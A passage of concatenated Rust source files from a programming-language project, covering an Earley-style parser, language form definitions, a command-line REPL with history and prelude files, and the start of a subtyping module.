fn similar<'f>(&'f self, other: &'f Item) -> bool { self.start_idx == other.start_idx && &*self.rule as *const FormPat == &*other.rule as *const FormPat && self.pos == other.pos && self.pc.grammar.almost_ptr_eq(&other.pc.grammar) } /// `false` if `other` might provide new information /// `true` if `other` definitely provides no new information /// (this is conservative regarding `wanted_by`) fn as_good_as<'f>(&'f self, other: &'f Item) -> bool { assert!(self.similar(other)); (*self.done.borrow() == *other.done.borrow() || !*other.done.borrow()) // no more done? && (*other.local_parse.borrow() <= *self.local_parse.borrow() ) // no "better" parse? && (other.wanted_by.borrow().len() == 0 // no more wanted? || (other.wanted_by.borrow().iter().all( |w| self.wanted_by.borrow().iter().any(|s_w| w == s_w)))) } fn merge(&self, other: &Item) { if *other.done.borrow() { *self.done.borrow_mut() = true; } use std::cmp::Ordering::*; let comparison = other.local_parse.borrow().partial_cmp(&*self.local_parse.borrow()); log!( "\n(For {}) Merging {:?} and {:?}... ", self.id.0, *other.local_parse.borrow(), *self.local_parse.borrow() ); match comparison { Some(Greater) => { *self.local_parse.borrow_mut() = other.local_parse.borrow().clone(); } Some(Equal) | Some(Less) => { /* no new information */ } None => { // TODO: maybe it would be nice to ignore ambiguities that "don't matter". // But even if `local_parse` is different, the resulting `Ast` can be the same. // So, maybe have `Ambiguous` store all possible ambiguities let amb = LocalParse::Ambiguous( Box::new(self.local_parse.borrow().clone()), Box::new(other.local_parse.borrow().clone()), ); *self.local_parse.borrow_mut() = amb; } } log!("... 
into {:#?}\n", *self.local_parse.borrow()); for other_wanted in other.wanted_by.borrow().iter() { let mut has = false; for self_wanted in self.wanted_by.borrow().iter() { if self_wanted == other_wanted { has = true; break; } } if !has { self.wanted_by.borrow_mut().push(*other_wanted) } } } // ----------------------------------------------------------- // These methods all make a (singleton) set of items after progressing `self` somehow // TODO: I have a lot of "like <one of these>, but" comments around this file... // fn finish_with(&self, lp: LocalParse, toks_consumed: usize) -> Vec<(Item, usize)> { log!("[fin_w/ ({})]", self.id.0); vec![( Item { done: RefCell::new(true), local_parse: RefCell::new(lp), pos: self.pos + 1, ..self.clone() }, toks_consumed, )] } fn start(&self, rule: &Rc<FormPat>, cur_idx: usize) -> Vec<(Item, usize)> { log!("[start ({})]", self.id.0); vec![( Item { start_idx: cur_idx, rule: rule.clone(), pos: 0, done: RefCell::new(false), pc: self.pc.clone(), common: self.common, file_id: self.file_id, local_parse: RefCell::new(LocalParse::NothingYet), id: get_next_id(), wanted_by: Rc::new(RefCell::new(vec![self.id.get_ref()])), }, 0, )] } // ----------------------------------------------------------- /// See what new items this item justifies fn examine(&self, toks: &str, cur_idx: usize, chart: &[Vec<Item>]) -> Vec<(Item, usize)> { let mut res = if *self.done.borrow() { let mut waiting_satisfied = vec![]; log!("({:#?}) done; {} items want it\n", self, (*self.wanted_by.borrow()).len()); for &waiting_item_id in self.wanted_by.borrow().iter() { if let Some(waiting_item) = chart[self.start_idx].iter().find(|i| i.id.is(waiting_item_id)) { // It's `None` if it's the startier item let me_justif = JustifiedByItem(self.id.get_ref()); // We `finish_with` here for things that are waiting on other items, // in `shift_or_predict` for leaves. // Except for `Seq`. TODO: why? 
let mut more = match *waiting_item.rule { Anyways(_) | Impossible | Scan(_, _) => { icp!("{:#?} should not be waiting for anything!", waiting_item) } Seq(ref subs) => { if (waiting_item.pos) as usize == subs.len() { vec![] } else { // Like `waiting_item.advance`, but with a local_parse vec![( Item { pos: waiting_item.pos + 1, local_parse: RefCell::new(me_justif), ..waiting_item.clone() }, 0, )] } } Plus(_) | Star(_) => { // It'll also keep going, though! waiting_item.finish_with(me_justif, 0) } SynImport(_, _, _) if waiting_item.pos == 0 => vec![( Item { pos: 1, local_parse: RefCell::new(me_justif), ..waiting_item.clone() }, 0, )], VarRef(_) | Alt(_) | Call(_) | Scope(_, _) | Pick(_, _) | Named(_, _) | SynImport(_, _, _) | NameImport(_, _) | NameImportPhaseless(_, _) | QuoteDeepen(_, _) | QuoteEscape(_, _) | Common(_) => waiting_item.finish_with(me_justif, 0), // Using `c_parse` instead of `local_parse` here is weird, // but probably necessary to allow `Call` under `Reserved`. Reserved(_, ref name_list) => match self.c_parse(chart, cur_idx) { Ok(ast_with_name) => match ast_with_name.c() { ast::Atom(name) | ast::VariableReference(name) => { if name_list.contains(&name) { vec![] } else { waiting_item.finish_with(me_justif, 0) } } _ => { log!("found something unusual {:?}", ast_with_name); vec![] } }, Err(_) => { log!("passing an error through `Reserved`"); waiting_item.finish_with(me_justif, 0) } }, Literal(_, expected) => match self.c_parse(chart, cur_idx) { Ok(ast) => { if ast.c() == &ast::Atom(expected) { waiting_item.finish_with(me_justif, 0) } else { vec![] } } _other => { log!("passing an error through `Literal`"); waiting_item.finish_with(me_justif, 0) } }, Biased(ref _plan_a, ref plan_b) => { if &*self.rule as *const FormPat == &**plan_b as *const FormPat { waiting_item.finish_with(JustifiedByItemPlanB(self.id.get_ref()), 0) } else { waiting_item.finish_with(me_justif, 0) } } }; waiting_satisfied.append(&mut more); } } waiting_satisfied } else { vec![] }; if 
!res.is_empty() { if let Call(_) = *res[0].0.rule { // HACK: I think that `Call` is uninformative } else if !self.common { // Possibly set the high-water mark for parse error purposes: best_token.with(|bt| { if cur_idx > bt.borrow().0 { // We've parsed further than ever before *bt.borrow_mut() = (cur_idx, res[0].0.rule.clone(), res[0].0.pos) } else if cur_idx == bt.borrow().0 && res[0].0.pos > bt.borrow().2 { // We're deeper into a rule than ever before *bt.borrow_mut() = (cur_idx, res[0].0.rule.clone(), res[0].0.pos) } }); } } res.append(&mut self.shift_or_predict(toks, cur_idx, chart)); res } fn shift_or_predict( &self, toks: &str, cur_idx: usize, chart: &[Vec<Item>], ) -> Vec<(Item, usize)> { // Try to shift (bump `pos`, or set `done`) or predict (`start` a new item) match (self.pos, &*(self.rule.clone())) { // TODO: is there a better way to match in `Rc`? (0, &Anyways(ref a)) => self.finish_with(ParsedAtom(a.clone()), 0), (_, &Impossible) => vec![], (0, &Literal(ref sub, _)) => self.start(sub, cur_idx), (0, &Scan(crate::grammar::Scanner(ref regex), _)) => { let mut caps = regex.capture_locations(); if regex.captures_read(&mut caps, &toks[cur_idx..]).is_some() { match caps.get(1) { Some((start, end)) => { // These are byte indices! 
self.finish_with( ParsedAtom(Ast(Rc::new(LocatedAst { c: ast::Atom(n(&toks[cur_idx + start..cur_idx + end])), file_id: self.file_id, begin: cur_idx + start, end: cur_idx + end, }))), caps.get(0).unwrap().1, // End of the *whole string consumed* ) } None => self.finish_with(NothingYet, caps.get(0).unwrap().1), } } else { vec![] } } (0, &VarRef(ref sub)) => self.start(sub, cur_idx), (pos, &Seq(ref subs)) => { if pos < subs.len() { self.start(&subs[pos as usize], cur_idx) } else if pos == subs.len() { // a little like `.finish`, but without advancing vec![(Item { done: RefCell::new(true), ..self.clone() }, 0)] } else { vec![] } } (_, &Star(ref sub)) => { // Special case: the elegant thing would be to create `Star` pre-`done` let mut res = if self.pos == 0 { // Like `.finish`, but without advancing vec![(Item { done: RefCell::new(true), ..self.clone() }, 0)] } else { vec![] }; res.append(&mut self.start(&sub, cur_idx)); // But we can take more! res } (_, &Plus(ref sub)) => self.start(&sub, cur_idx), (0, &Alt(ref subs)) => { let mut res = vec![]; for sub in subs { res.append(&mut self.start(&(*sub), cur_idx)); } res } // Needs special handling elsewhere! (0, &Biased(ref plan_a, ref plan_b)) => { let mut res = self.start(&plan_a, cur_idx); res.append(&mut self.start(&plan_b, cur_idx)); res } (0, &Call(n)) => self.start(&self.pc.grammar.find_or_panic(&n), cur_idx), (0, &Scope(ref f, _)) => { // form.grammar is a FormPat. Confusing! self.start(&f.grammar, cur_idx) } (0, &Pick(ref body, _)) => self.start(&body, cur_idx), (0, &SynImport(ref lhs, _, _)) => self.start(&lhs, cur_idx), (1, &SynImport(_, ref body, ref f)) => { // TODO: handle errors properly! Probably need to memoize, also! // TODO: an ambiguity or error here leads to a pretty confusing parse failure. // It ought to be an outright parse error, // even if it theoretically could get papered over, // but we don't have a way to communicate those here. 
let partial_parse = match *self.local_parse.borrow() { NothingYet => return vec![], Ambiguous(_, _) => { println!( "Warning: ambiguity in syntax import! {:?}", *self.local_parse.borrow() ); return vec![]; } ParsedAtom(ref a) => a.clone(), JustifiedByItem(_) | JustifiedByItemPlanB(_) => { match self .find_wanted(chart, cur_idx) .map(|item| item.c_parse(chart, cur_idx)) { Ok(Ok(ast)) => ast, e => { println!("Warning: error in syntax import! {:?}", e); return vec![]; } } } }; // We can't use `.or_insert_with()` here, // since "import" can encounter grammars with extensions while extending! let existing_pc = all_parse_contexts .with(|grammars| grammars.borrow().get(&self.id.get_ref()).cloned()); let new_ctxt = match existing_pc { Some(pc) => pc, None => { let new_ctxt = f.0((*self.pc).clone(), partial_parse); all_parse_contexts.with(|grammars| { grammars.borrow_mut().insert(self.id.get_ref(), new_ctxt.clone()) }); new_ctxt } }; vec![( Item { start_idx: cur_idx, rule: body.clone(), pos: 0, done: RefCell::new(false), pc: Rc::new(new_ctxt), common: false, file_id: self.file_id, local_parse: RefCell::new(LocalParse::NothingYet), id: get_next_id(), wanted_by: Rc::new(RefCell::new(vec![self.id.get_ref()])), }, 0, )] } (0, &Named(_, ref body)) | (0, &NameImport(ref body, _)) | (0, &NameImportPhaseless(ref body, _)) | (0, &QuoteDeepen(ref body, _)) | (0, &QuoteEscape(ref body, _)) | (0, &Reserved(ref body, _)) => self.start(&body, cur_idx), (0, &Common(ref body)) => { let mut res = self.start(&body, cur_idx); res[0].0.common = true; // Only has one element res } // Rust rightly complains that this is unreachable; yay! // But how do I avoid a catch-all pattern for the pos > 0 case? 
//(0, _) => { icp!("unhandled FormPat") }, _ => vec![], // end of a rule } } fn find_wanted<'f, 'c>( &'f self, chart: &'c [Vec<Item>], done_tok: usize, ) -> Result<&'c Item, ParseError> { let mut first_found: Option<&Item> = None; let local_parse = self.local_parse.borrow().clone(); let desired_id = match local_parse { JustifiedByItem(id) | JustifiedByItemPlanB(id) => id, Ambiguous(ref l, ref r) => { // HACK: this is quite ugly! let l = *l.clone(); let r = *r.clone(); log!("===Ambiguity===\n"); // Show both parses... *self.local_parse.borrow_mut() = l; let l_res = self.c_parse(chart, done_tok).unwrap(); *self.local_parse.borrow_mut() = r; let r_res = self.c_parse(chart, done_tok).unwrap(); return Err(ParseError { msg: format!("Ambiguity! \n=L=>{}\n=R=>{}\n", l_res, r_res), }); } _ => icp!("tried to parse unjustified item: {:#?} ", self), }; log!("We are {:#?} at {}...\n", self, done_tok); for idx in 0..chart[done_tok].len() { let i = &chart[done_tok][idx]; if i.id.is(desired_id) { match first_found { None => { first_found = Some(i); } Some(_) => icp!("unacknowledged ambiguity!"), } } } Ok(first_found.expect("ICP: no parse after successful recognition")) } /// Put location information on an `AstContents`, forming an `Ast`. fn locate(&self, done_tok: usize, c: ast::AstContents) -> Ast { Ast(Rc::new(ast::LocatedAst { c: c, file_id: self.file_id, begin: self.start_idx, end: done_tok, })) } /// After the chart is built, we parse... fn c_parse(&self, chart: &[Vec<Item>], done_tok: usize) -> ParseResult { log!("Tring to parse {:#?}...\n", self); // assert!(*self.done.borrow()); // false during ambiguity reporting let res = match *self.rule { Anyways(ref a) => Ok(a.clone()), Impossible => icp!("Parser parsed the impossible!"), Scan(_, _) => match self.local_parse.borrow().clone() { ParsedAtom(a) => Ok(a), NothingYet => Ok(ast!((trivial))), // TODO: should we fake location info here? 
_ => icp!(), }, VarRef(_) => { let var_ast = self.find_wanted(chart, done_tok)?.c_parse(chart, done_tok)?; match var_ast.c() { ast::Atom(a) => Ok(var_ast.with_c(ast::VariableReference(*a))), _ => icp!("no atom saved"), } } Literal(_, _) | Alt(_) | Biased(_, _) | Call(_) | Reserved(_, _) | Common(_) => { self.find_wanted(chart, done_tok)?.c_parse(chart, done_tok) } Seq(_) | Star(_) | Plus(_) | SynImport(_, _, _) => { let mut step = self; let mut subtrees: Vec<Ast> = vec![];
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/form.rs
src/form.rs
#![macro_use] use crate::{ ast_walk::WalkRule, grammar::FormPat, name::*, util::assoc::Assoc, walk_mode::WalkMode, }; use std::{ fmt::{Debug, Error, Formatter}, rc::Rc, }; pub type NMap<T> = Assoc<Name, T>; /// "BiDirectionalWalkRule": a walk rule, abstracted over whether the walk is positive or negative pub type BiDiWR<Mode, NegMode> = EitherPN<WalkRule<Mode>, WalkRule<NegMode>>; custom_derive! { /// Unseemly language form. This is what tells us what a particular `Node` actually does. #[derive(Reifiable)] pub struct Form { /// The name of the form. Mainly for internal use. pub name: Name, /// The grammar the programmer should use to invoke this form. /// This contains information about bindings and syntax extension: pub grammar: Rc<FormPat>, /// (Meaningful for types only) Subtype. pub type_compare: BiDiWR<crate::ty_compare::Canonicalize, crate::ty_compare::Subtype>, /// From a type environment, construct the type of this term. pub synth_type: BiDiWR<crate::ty::SynthTy, crate::ty::UnpackTy>, /// (Meaningful for exprs and pats only) From a value environment, evaluate this term. /// Or, (HACK) macro expansion, for macro invocations (just so we don't need another field) pub eval: BiDiWR<crate::runtime::eval::Eval, crate::runtime::eval::Destructure>, /// At runtime, pick up code to use it as a value pub quasiquote: BiDiWR<crate::runtime::eval::QQuote, crate::runtime::eval::QQuoteDestr>, } } custom_derive! { /// The distinction between `Form`s with positive and negative walks is documented at `Mode`. 
#[derive(Reifiable)] pub enum EitherPN<L, R> { Positive(L), Negative(R), Both(L, R) // Maybe instead of WalkRule::NotWalked, we need EitherPN::Neither } } pub use self::EitherPN::*; impl<Mode: WalkMode> EitherPN<WalkRule<Mode>, WalkRule<Mode::Negated>> { pub fn pos(&self) -> &WalkRule<Mode> { match *self { Positive(ref l) | Both(ref l, _) => l, Negative(_) => &WalkRule::NotWalked, } } pub fn neg(&self) -> &WalkRule<Mode::Negated> { match *self { Negative(ref r) | Both(_, ref r) => r, Positive(_) => &WalkRule::NotWalked, } } pub fn is_pos(&self) -> bool { match *self { Negative(_) => false, _ => true, } } pub fn is_neg(&self) -> bool { match *self { Positive(_) => false, _ => true, } } } impl PartialEq for Form { /// pointer equality on the underlying structure! fn eq(&self, other: &Form) -> bool { self as *const Form == other as *const Form } } impl Debug for Form { fn fmt(&self, formatter: &mut Formatter) -> Result<(), Error> { formatter.write_str(format!("[FORM {:#?}]", self.name).as_str()) } } pub fn simple_form(form_name: &str, p: FormPat) -> Rc<Form> { use WalkRule::*; Rc::new(Form { name: n(form_name), grammar: Rc::new(p), type_compare: Both(NotWalked, NotWalked), synth_type: Positive(NotWalked), eval: Positive(NotWalked), quasiquote: Both(LiteralLike, LiteralLike), }) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/cli.rs
src/cli.rs
#![allow(non_snake_case)] use std::{fs::File, io::Read, path::Path}; use libunseemly::{ ast, ast::Ast, core_forms, expand, grammar, name::{n, Name}, runtime::{core_values, eval, eval::Value}, ty, ty_compare, util::assoc::Assoc, }; use std::{borrow::Cow, cell::RefCell, io::BufRead}; thread_local! { pub static TY_ENV : RefCell<Assoc<Name, Ast>> = RefCell::new(core_values::core_types()); pub static VAL_ENV : RefCell<Assoc<Name, Value>> = RefCell::new(core_values::core_values()); } #[cfg_attr(tarpaulin, skip)] fn main() { let arguments: Vec<String> = std::env::args().collect(); if arguments.len() == 1 { repl(); } else if arguments.len() == 2 { let filename = Path::new(&arguments[1]); let mut raw_input = String::new(); File::open(&filename) .expect("Error opening file") .read_to_string(&mut raw_input) .expect("Error reading file"); // So the file can import (etc.) relative to its own location: if let Some(dir) = filename.parent() { if dir.is_dir() { std::env::set_current_dir(dir).unwrap(); } } libunseemly::terminal_display(libunseemly::eval_unseemly_program_top(&raw_input)); } else if arguments.len() == 3 { let lang = libunseemly::language_from_file(&std::path::Path::new(&arguments[1])); // Run the second program in the language defined by the first: let mut second_program = String::new(); File::open(&Path::new(&arguments[2])) .expect("Error opening file") .read_to_string(&mut second_program) .expect("Error reading file"); if let Some(dir) = Path::new(&arguments[2]).parent() { if dir.is_dir() { std::env::set_current_dir(dir).unwrap(); } } libunseemly::terminal_display(libunseemly::eval_program(&second_program, lang)); } } struct LineHelper { highlighter: rustyline::highlight::MatchingBracketHighlighter, // Braket-matching isn't exactly right, // but running the whole parser to decide whether more lines are needed is probably ... bad. 
validator: rustyline::validate::MatchingBracketValidator, } impl LineHelper { fn new() -> LineHelper { LineHelper { highlighter: rustyline::highlight::MatchingBracketHighlighter::new(), validator: rustyline::validate::MatchingBracketValidator::new(), } } } impl rustyline::completion::Completer for LineHelper { type Candidate = String; fn complete( &self, line: &str, pos: usize, _ctxt: &rustyline::Context, ) -> Result<(usize, Vec<String>), rustyline::error::ReadlineError> { let mut res = vec![]; let (start, word_so_far) = rustyline::completion::extract_word(line, pos, None, b"[({ })]"); VAL_ENV.with(|vals| { let vals = vals.borrow(); for k in vals.iter_keys() { if k.sp().starts_with(word_so_far) { res.push(k.sp()); } } }); Ok((start, res)) } } impl rustyline::hint::Hinter for LineHelper { type Hint = String; fn hint(&self, _line: &str, _pos: usize, _ctxt: &rustyline::Context) -> Option<String> { None } } impl rustyline::highlight::Highlighter for LineHelper { fn highlight<'l>(&self, line: &'l str, pos: usize) -> Cow<'l, str> { self.highlighter.highlight(line, pos) } fn highlight_prompt<'b, 's: 'b, 'p: 'b>( &'s self, prompt: &'p str, default: bool, ) -> Cow<'b, str> { self.highlighter.highlight_prompt(prompt, default) } fn highlight_hint<'h>(&self, hint: &'h str) -> Cow<'h, str> { self.highlighter.highlight_hint(hint) } fn highlight_candidate<'c>( &self, candidate: &'c str, completion: rustyline::config::CompletionType, ) -> Cow<'c, str> { self.highlighter.highlight_candidate(candidate, completion) } fn highlight_char(&self, line: &str, pos: usize) -> bool { self.highlighter.highlight_char(line, pos) } } impl rustyline::validate::Validator for LineHelper { fn validate( &self, ctx: &mut rustyline::validate::ValidationContext, ) -> rustyline::Result<rustyline::validate::ValidationResult> { self.validator.validate(ctx) } fn validate_while_typing(&self) -> bool { self.validator.validate_while_typing() } } impl rustyline::Helper for LineHelper {} pub fn repl() { let 
prelude_filename = dirs::home_dir().unwrap().join(".unseemly_prelude"); let history_filename = dirs::home_dir().unwrap().join(".unseemly_history"); let mut rl = rustyline::Editor::<LineHelper>::new(); rl.set_helper(Some(LineHelper::new())); let quit = regex::Regex::new(r"\s*quit\s*").unwrap(); let just_parse = regex::Regex::new(r"^:p (.*)$").unwrap(); let just_parse_debug_print = regex::Regex::new(r"^:pd (.*)$").unwrap(); let just_type = regex::Regex::new(r"^:t (.*)$").unwrap(); let just_eval = regex::Regex::new(r"^:e (.*)$").unwrap(); let type_and_expand = regex::Regex::new(r"^:x (.*)$").unwrap(); let canon_type = regex::Regex::new(r"^:tt (.*)$").unwrap(); let subtype = regex::Regex::new(r"^:sub (.*)\s*<:\s*(.*)$").unwrap(); let assign_value = regex::Regex::new(r"^(\w+)\s*:=(.*)$").unwrap(); let save_value = regex::Regex::new(r"^:s +((\w+)\s*:=(.*))$").unwrap(); let assign_type = regex::Regex::new(r"^(\w+)\s*t=(.*)$").unwrap(); let save_type = regex::Regex::new(r"^:s +((\w+)\s*t=(.*))$").unwrap(); let comment = regex::Regex::new(r"^#").unwrap(); println!(); println!(" \x1b[1;38mUnseemly\x1b[0m"); println!(" `<expr>` to (typecheck and expand and) evaluate `<expr>`."); println!(" `:x <expr>` to (typecheck and) expand `<expr>`."); println!(" `:e <expr>` to (expand and) evaluate `<expr>` without typechecking."); println!(" `<name> := <expr>` to bind a name for this session."); println!(" `:t <expr>` to synthesize the type of <expr>."); println!(" `:tt <type>` to canonicalize <type>."); println!(" `:sub <type_a> <: <type_b>` to check that `<type_a>` is a subtype of `<type_b>`"); println!(" `<name> t= <type>` to bind a type for this session."); println!(" `:s <name> := <expr>` to save a binding to the prelude for the future."); println!(" `:s <name> t= <expr>` to save a type binding to the prelude."); println!(" `:p <expr>` to parse `<expr>` and pretty-print its AST output."); println!(" `:pd <expr>` to parse `<expr>` and debug-print its AST output."); println!(" 
Command history is saved over sessions."); println!(" Tab-completion works on variables, and lots of Bash-isms work."); if let Ok(prelude_file) = File::open(&prelude_filename) { let prelude = std::io::BufReader::new(prelude_file); for line in prelude.lines() { let line = line.unwrap(); if comment.captures(&line).is_some() { // comment } else if let Some(caps) = assign_value.captures(&line) { if let Err(e) = assign_variable(&caps[1], &caps[2]) { println!(" Error in prelude line: {}\n {}", line, e); } } else if let Some(caps) = assign_type.captures(&line) { if let Err(e) = assign_t_var(&caps[1], &caps[2]) { println!(" Error in prelude line: {}\n {}", line, e); } } } println!(" [prelude loaded from {}]", prelude_filename.display()); } println!(); println!("This virtual machine kills cyber-fascists."); let _ = rl.load_history(&history_filename); while let Ok(line) = rl.readline("\x1b[1;36m≫\x1b[0m ") { // TODO: count delimiters, and allow line continuation! rl.add_history_entry(line.clone()); if quit.captures(&line).is_some() { break; } let result = if let Some(caps) = just_parse.captures(&line) { parse_unseemly_program(&caps[1], true) } else if let Some(caps) = just_parse_debug_print.captures(&line) { parse_unseemly_program(&caps[1], false) } else if let Some(caps) = just_type.captures(&line) { type_unseemly_program(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = just_eval.captures(&line) { eval_unseemly_program_without_typechecking(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = type_and_expand.captures(&line) { type_and_expand_unseemly_program(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = canon_type.captures(&line) { canonicalize_type(&caps[1]).map(|x| format!("{}", x)) } else if let Some(caps) = subtype.captures(&line) { check_subtype(&caps[1], &caps[2]).map(|x| format!("{}", x)) } else if let Some(caps) = assign_value.captures(&line) { assign_variable(&caps[1], &caps[2]).map(|x| format!("{}", x)) } else if let 
Some(caps) = save_value.captures(&line) { match assign_variable(&caps[2], &caps[3]) { Ok(_) => { use std::io::Write; let mut prel_file = std::fs::OpenOptions::new() .create(true) .append(true) .open(&prelude_filename) .unwrap(); writeln!(prel_file, "{}", &caps[1]).unwrap(); Ok(format!("[saved to {}]", &prelude_filename.display())) } Err(e) => Err(e), } } else if let Some(caps) = assign_type.captures(&line) { assign_t_var(&caps[1], &caps[2]).map(|x| format!("{}", x)) } else if let Some(caps) = save_type.captures(&line) { match assign_t_var(&caps[2], &caps[3]) { Ok(_) => { use std::io::Write; let mut prel_file = std::fs::OpenOptions::new() .create(true) .append(true) .open(&prelude_filename) .unwrap(); writeln!(prel_file, "{}", &caps[1]).unwrap(); Ok(format!("[saved to {}]", &prelude_filename.display())) } Err(e) => Err(e), } } else { eval_unseemly_program(&line).map(|x| format!("{}", x)) }; match result { Ok(v) => println!("\x1b[1;32m≉\x1b[0m {}", v), Err(s) => println!("\x1b[1;31m✘\x1b[0m {}", s), } } println!("Bye! 
Saving history to {}", &history_filename.display()); rl.save_history(&history_filename).unwrap(); } fn assign_variable(name: &str, expr: &str) -> Result<Value, String> { let res = eval_unseemly_program(expr); if let Ok(ref v) = res { let ty = type_unseemly_program(expr).unwrap(); TY_ENV.with(|tys| { VAL_ENV.with(|vals| { let new_tys = tys.borrow().set(n(name), ty); let new_vals = vals.borrow().set(n(name), v.clone()); *tys.borrow_mut() = new_tys; *vals.borrow_mut() = new_vals; }) }) } res } fn assign_t_var(name: &str, t: &str) -> Result<Ast, String> { let ast = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t, ) .map_err(|e| e.msg)?; let res = TY_ENV.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))); if let Ok(ref t) = res { TY_ENV.with(|tys| { let new_tys = tys.borrow().set(n(name), t.clone()); *tys.borrow_mut() = new_tys; }) } res } fn canonicalize_type(t: &str) -> Result<Ast, String> { let ast = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t, ) .map_err(|e| e.msg)?; TY_ENV.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))) } fn check_subtype(t_a: &str, t_b: &str) -> Result<Ast, String> { let ast_a = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t_a, ) .map_err(|e| e.msg)?; let ast_b = grammar::parse( &grammar::FormPat::Call(n("Type")), core_forms::outermost__parse_context(), t_b, ) .map_err(|e| e.msg)?; TY_ENV.with(|tys| { ty_compare::must_subtype(&ast_a, &ast_b, tys.borrow().clone()) .map( // TODO: just figure out how to import `ast!` instead: |env| { ast::Ast(std::rc::Rc::new(ast::LocatedAst { c: ast::Atom(n(&format!("OK, under this environment: {}", env))), begin: 0, end: 0, file_id: 0, })) }, ) .map_err(|e| format!("{}", e)) }) } fn parse_unseemly_program(program: &str, pretty: bool) -> Result<String, String> { let ast = grammar::parse( 
&core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; if pretty { Ok(format!("{}", ast)) } else { Ok(format!("{:#?}", ast)) } } fn type_unseemly_program(program: &str) -> Result<Ast, String> { let ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; TY_ENV.with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e))) } fn eval_unseemly_program_without_typechecking(program: &str) -> Result<Value, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let core_ast = expand::expand(&ast).map_err(|_| "error".to_owned())?; VAL_ENV.with(|vals| eval::eval(&core_ast, vals.borrow().clone()).map_err(|_| "???".to_string())) } fn eval_unseemly_program(program: &str) -> Result<Value, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let _type = TY_ENV .with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e)))?; let core_ast = expand::expand(&ast).map_err(|_| "error".to_owned())?; VAL_ENV.with(|vals| eval::eval(&core_ast, vals.borrow().clone()).map_err(|_| "???".to_string())) } fn type_and_expand_unseemly_program(program: &str) -> Result<ast::Ast, String> { let ast: Ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), program, ) .map_err(|e| e.msg)?; let _type = TY_ENV .with(|tys| ty::synth_type(&ast, tys.borrow().clone()).map_err(|e| format!("{}", e)))?; expand::expand(&ast).map_err(|_| "error".to_owned()) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/subtype.rs
src/subtype.rs
use crate::{ ast::{ Ast, AstContents::{Atom, Node, Shape, VariableReference}, }, ast_walk::{walk, LazyWalkReses, WalkRule}, form::Form, name::{n, Name}, ty::TypeError, util::assoc::Assoc, walk_mode::{NegativeWalkMode, WalkMode}, }; custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct Subtype {} } // TODO: gensym and store fn mystery_id() -> Name { n("mystery_for_typechecking") } fn new_mystery(supers: Vec<Ast>, subs: Vec<Ast>) -> Ast { raw_ast!(Shape(vec![ raw_ast!(Atom(mystery_id())), raw_ast!(Shape(supers)), raw_ast!(Shape(subs)) ])) } fn is_mystery(a: &Ast) -> bool { let Shape(shape_parts) = a.c() else { return false; }; return !shape_parts.is_empty() && shape_parts[0].c() == &Atom(mystery_id()); } fn unpack_mystery(mystery: &Ast) -> (Vec<Ast>, Vec<Ast>) { let Shape(mystery_parts) = mystery.c() else { icp!() }; let Shape(subs) = mystery_parts[2].c().clone() else {icp!() }; let Shape(supers) = mystery_parts[1].c().clone() else {icp!() }; (supers, subs) } fn complete_mystery() -> Ast { new_mystery(vec![], vec![]) } fn constrain_mystery(mystery: &Ast, constraint: Ast, super_type: bool) -> Ast { let (mut supers, mut subs) = unpack_mystery(mystery); let constraints = if super_type { &mut supers } else { &mut subs }; if !constraints.contains(&constraint) { constraints.push(constraint); } new_mystery(supers, subs) } // If `ty` is a mystery, return it; otherwise, make it a fully-constrained mystery fn ensure_mystery(ty: Ast) -> Ast { if is_mystery(&ty) { return ty; } new_mystery(vec![ty.clone()], vec![ty]) } fn merge_mysteries(mystery_lhs: &Ast, mystery_rhs: &Ast) -> Ast { let mut lhs = unpack_mystery(mystery_lhs); let rhs = unpack_mystery(mystery_rhs); for constraint in rhs.0 { if !lhs.0.contains(&constraint) { lhs.0.push(constraint); } } for constraint in rhs.1 { if !lhs.1.contains(&constraint) { lhs.1.push(constraint); } } new_mystery(lhs.0, lhs.1) } fn mystery_satisfiable(mystery: &Ast, parts: &LazyWalkReses<Subtype>) -> Result<(), TypeError> { let 
